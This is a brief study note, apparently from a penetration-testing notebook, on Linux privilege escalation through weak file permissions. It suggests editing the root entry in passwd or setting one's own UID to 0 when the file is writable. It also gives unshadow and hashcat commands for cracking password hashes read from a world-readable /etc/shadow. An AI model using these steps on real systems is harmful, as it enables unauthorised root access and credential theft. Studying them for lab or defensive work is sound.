# Weak File Permissions

<figure><img src="https://content.gitbook.com/content/p6nDpW0GBTPP8pZM4JHQ/blobs/PAJV52U5ljXhKl3MLdty/image.png" alt=""><figcaption></figcaption></figure>

### Check permissions of the shadow file

<figure><img src="https://content.gitbook.com/content/p6nDpW0GBTPP8pZM4JHQ/blobs/I5KpTeDbEk5lJnfwTfIN/image.png" alt=""><figcaption></figcaption></figure>

Reading the file is allowed by "other" users who aren't the owner or in the owning group

{% hint style="info" %}
It is possible to just change the **x** for the root user in the **passwd** file, then su using no password

Or we can change our users user and group id to 0 to become the root user
{% endhint %}

{% embed url="<https://infinitelogins.com/2021/02/24/linux-privilege-escalation-weak-file-permissions-writable-etc-shadow/>" %}

### Cracking shadow passwords

Copy contents of passwd and shadow into new files on your machine

Use **unshadow** to turn into a easier crackable format ad fill in the blank

```
unshadow passwd shadow > unshadow
```

Find hash type

```
hashcat --example-hashes | grep -i '\$6\$'
```

Crack

```
hashcat -m 1800 unshadow ~/rockyou.txt -O
```